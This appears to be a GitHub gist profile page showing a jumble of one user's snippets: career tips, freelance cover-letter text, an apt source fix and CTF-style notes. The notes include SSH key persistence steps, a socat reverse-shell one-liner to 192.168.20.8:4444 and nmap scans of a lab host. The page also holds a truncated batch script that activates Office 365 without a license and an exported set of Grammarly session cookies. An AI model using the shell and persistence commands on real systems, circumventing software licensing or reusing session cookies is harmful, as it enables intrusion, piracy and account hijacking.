Skip to content

Instantly share code, notes, and snippets.

View Cuncis's full-sized avatar
😜
Like a Boss

Cuncis

😜
Like a Boss
View GitHub Profile
- client machine
ssh-keygen
cp id_rsa.pub authorized_keys
cat id_rsa ----> copy to local file (ssh -i id_rsa <user>@<ip>)
chmod 700 ../.ssh/
chmod 600 *
chown woodenk:woodenk *
Thank you!
Here are the steps for others who will experience this similar issue. Based on your answer I did so it worked.
sudo nano /etc/apt/sources.list.d/cloudflare-client.list
deb [arch=amd64 signed-by=/usr/share/keyrings/cloudflare-warp-archive-keyring.gpg] https://pkg.cloudflareclient.com/ jammy main
victory => jammy
1) Connect with Right People in Cybersecurity
2) Get Certified
3) Networking with Professionals (LinkedIn)
4) Build Online Presence & Give back to the Infosec Community
- Write blogs and share whatever you have learned. It can be something basic as well which you recently learned, but you can explain it in simpler way.
- Write ctf writeups and contribute to the community.
- You can also make videos on YouTube if content creation interests you.
- Attend hacker conferences like Nullcon, Defcon, Bsides, give speeches and training.
- Share your work/projects on GitHub.
- If you have an online presence and have done something for the community, Recruiters will give you a lot of preference as it shows your genuine willingness to learn and share knowledge.
socat file:`tty`,raw,echo=0 tcp-listen:4444
socat exec:'bash' -li',pty,stderr,setsid,sigint,sane tcp:192.168.20.8:4444
nmap -p- --min-rate 10000 10.10.10.48
nmap -p 22,53,80,1877,32400,32469 -sCV 10.10.10.48
```````
cat file | xclip -selection clipboard
```````
Remote work is the future.
``````````````````````````````````````````````````````````````````````````````````````````````````````````````
# Cover Letter #
As an experienced freelancer, I offer top-notch data entry skills, proficiency in Excel, PDF editing, Word, and copy typing. With attention to detail and accuracy, I ensure high-quality work. Let's collaborate to meet your project goals efficiently.
``````````````````````````````````````````````````````````````````````````````````````````````````````````````
# Title of Our Offer #
Do any kind of data entry work for 1 hour
# Description of Our Offer #
(1. Subject Line)
Subject: Monthly Meeting- Chris from Administrative division
(2. Greeting/salutation)
Dear George,
(3. Introduction)
My name is Juana from ABCD Corporation. We are excited to inform that your partnership proposal has been confirmed.
(4. Email Body)
https://twitter.com/caljhud/status/1671803272930140160
``
1/ FlexJobs
Hands-down, the most comprehensive remote job board that I’ve found.
You can filter for full-time remote positions.
flexjobs.com
https://gist.github.com/coolaj86/6f4f7b30129b0251f61fa7baaa881516
@echo off
title Activate Office 365 ProPlus for FREE - MSGuides.com&cls&echo =====================================================================================&echo #Project: Activating Microsoft software products for FREE without additional software&echo =====================================================================================&echo.&echo #Supported products: Office 365 ProPlus (x86-x64)&echo.&echo.&(if exist "%ProgramFiles%\Microsoft Office\Office16\ospp.vbs" cd /d "%ProgramFiles%\Microsoft Office\Office16")&(if exist "%ProgramFiles(x86)%\Microsoft Office\Office16\ospp.vbs" cd /d "%ProgramFiles(x86)%\Microsoft Office\Office16")&(for /f %%x in ('dir /b ..\root\Licenses16\proplusvl_kms*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul)&(for /f %%x in ('dir /b ..\root\Licenses16\proplusvl_mak*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul)&echo.&echo ============================================================================&echo Activating your Office...&c
[
{
"domain": ".grammarly.com",
"expirationDate": 1688568923,
"hostOnly": false,
"httpOnly": false,
"name": "_gcl_au",
"path": "/",
"sameSite": null,
"secure": false,